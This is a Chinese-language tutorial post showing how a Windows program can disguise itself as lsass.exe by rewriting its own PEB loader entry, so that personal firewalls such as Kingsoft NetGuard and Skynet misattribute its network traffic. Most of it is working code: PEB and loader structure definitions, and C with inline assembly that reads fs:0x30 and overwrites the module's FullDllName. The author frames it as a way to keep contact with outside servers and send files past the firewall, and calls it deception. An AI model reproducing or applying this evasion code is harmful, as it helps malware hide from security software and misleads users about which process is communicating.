修改程序的peb过某些防火墙

现在自己构造数据包进行发送已经不是很现实了，简单的数据还行，如果是大的数据，比如发送一个文件，比如不停的和外界的服务器保持联系，都是很不方便的，所以找到了一个方法，就是将程序的peb修改成和某些系统进程一样的peb，这样就在一定程度上伪装成了系统进程，这里以lsass.exe为例。有关peb的资料请自己查相关资料，或者是好好看看 windows核心编程，windows程序设计。

首先声明相关的结构体

typedef void (*PPEBLOCKROUTINE)(PVOID PebLock);

typedef struct _UNICODE_STRING {
        USHORT Length;
        USHORT MaximumLength;
        PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _RTL_DRIVE_LETTER_CURDIR {
        USHORT Flags;
        USHORT Length;
        ULONG TimeStamp;
        UNICODE_STRING DosPath;
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;

typedef struct _PEB_LDR_DATA
{
        ULONG Length;
        BOOLEAN Initialized;
        PVOID SsHandle;
        LIST_ENTRY InLoadOrderModuleList;
        LIST_ENTRY InMemoryOrderModuleList;
        LIST_ENTRY InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

typedef struct _LDR_MODULE {
        LIST_ENTRY InLoadOrderModuleList;
        LIST_ENTRY InMemoryOrderModuleList;
        LIST_ENTRY InInitializationOrderModuleList;
        PVOID BaseAddress;
        PVOID EntryPoint;
        ULONG SizeOfImage;
        UNICODE_STRING FullDllName;
        UNICODE_STRING BaseDllName;
        ULONG Flags;
        SHORT LoadCount;
        SHORT TlsIndex;
        LIST_ENTRY HashTableEntry;
        ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;

typedef struct _RTL_USER_PROCESS_PARAMETERS {
        ULONG MaximumLength;
        ULONG Length;
        ULONG Flags;
        ULONG DebugFlags;
        PVOID ConsoleHandle;
        ULONG ConsoleFlags;
        HANDLE StdInputHandle;
        HANDLE StdOutputHandle;
        HANDLE StdErrorHandle;
        UNICODE_STRING CurrentDirectoryPath;
        HANDLE CurrentDirectoryHandle;
        UNICODE_STRING DllPath;
        UNICODE_STRING ImagePathName;
        UNICODE_STRING CommandLine;
        PVOID Environment;
        ULONG StartingPositionLeft;
        ULONG StartingPositionTop;
        ULONG Width;
        ULONG Height;
        ULONG CharWidth;
        ULONG CharHeight;
        ULONG ConsoleTextAttributes;
        ULONG WindowFlags;
        ULONG ShowWindowFlags;
        UNICODE_STRING WindowTitle;
        UNICODE_STRING DesktopName;
        UNICODE_STRING ShellInfo;
        UNICODE_STRING RuntimeData;
        RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;

typedef struct _PEB_FREE_BLOCK {
        struct _PEB_FREE_BLOCK *Next;
        ULONG Size;
} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK;

typedef struct _PEB {
        BOOLEAN InheritedAddressSpace;
        BOOLEAN ReadImageFileExecOptions;
        BOOLEAN BeingDebugged;
        BOOLEAN Spare;
        HANDLE Mutant;
        PVOID ImageBaseAddress;
        PPEB_LDR_DATA LoaderData;                                                       
        PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
        PVOID SubSystemData;
        PVOID ProcessHeap;
        PVOID FastPebLock;
        PPEBLOCKROUTINE FastPebLockRoutine;
        PPEBLOCKROUTINE FastPebUnlockRoutine;
        ULONG EnvironmentUpdateCount;
        PVOID *KernelCallbackTable;
        PVOID EventLogSection;
        PVOID EventLog;
        PPEB_FREE_BLOCK FreeList;
        ULONG TlsExpansionCounter;
        PVOID TlsBitmap;
        ULONG TlsBitmapBits[0x2];
        PVOID ReadOnlySharedMemoryBase;
        PVOID ReadOnlySharedMemoryHeap;
        PVOID *ReadOnlyStaticServerData;
        PVOID AnsiCodePageData;
        PVOID OemCodePageData;
        PVOID UnicodeCaseTableData;
        ULONG NumberOfProcessors;
        ULONG NtGlobalFlag;
        BYTE Spare2[0x4];
        LARGE_INTEGER CriticalSectionTimeout;
        ULONG HeapSegmentReserve;
        ULONG HeapSegmentCommit;
        ULONG HeapDeCommitTotalFreeThreshold;
        ULONG HeapDeCommitFreeBlockThreshold;
        ULONG NumberOfHeaps;
        ULONG MaximumNumberOfHeaps;
        PVOID **ProcessHeaps;
        PVOID GdiSharedHandleTable;
        PVOID ProcessStarterHelper;
        PVOID GdiDCAttributeList;
        PVOID LoaderLock;
        ULONG OSMajorVersion;
        ULONG OSMinorVersion;
        ULONG OSBuildNumber;
        ULONG OSPlatformId;
        ULONG ImageSubSystem;
        ULONG ImageSubSystemMajorVersion;
        ULONG ImageSubSystemMinorVersion;
        ULONG GdiHandleBuffer[0x22];
        ULONG PostProcessInitRoutine;
        ULONG TlsExpansionBitmap;
        BYTE TlsExpansionBitmapBits[0x80];
        ULONG SessionId;
} PEB, *PPEB;

然后开始使用

PPEB peb;
 PLDR_MODULE pMod;
 
 char systempAth[PATHLEN*2];
 char tempsystempAth[PATHLEN*2];
 int i;
 GetSystemDirectory(tempsystempAth,PATHLEN);
 strcat(tempsystempAth,"//lsass.exe");
 //把ASCII转换为UNICODE，字符
 for (i=0;i<PATHLEN;i++)
 {
  systempAth[i*2] = tempsystempAth[i];
  systempAth[i*2+1] = 0;
 }
 __asm
 {
  mov eax,fs:0x30
  mov peb,eax
 }
 
 pMod = (LDR_MODULE*)peb->LoaderData->InLoadOrderModuleList.Flink;
 pMod->FullDllName.MaximumLength = 202;
 pMod->FullDllName.Length = 200;
 pMod->FullDllName.Buffer = (unsigned short*)systempAth;

这样，就将自己的程序peb伪装成了lsass.exe，金山网镖、天网防火墙这个时候已经不能正确识别我们当前的程序，这个时候只要程序一进行网络通讯，天网和网镖会提示lsass.exe要访问网络，当然了，这个时候如果是选择阻止，还是没法穿透防火墙的，说白了这种方法就是一种欺骗。当然了，除了伪装成lsass.exe还可以伪装成其他的程序，比如explorer.exe都可以，但是有个问题，如果当前的程序不稳定，代码不严格，程序崩溃的话，你所伪装成的程序也是会收到影响的，也会崩溃，所以此种方法要慎用。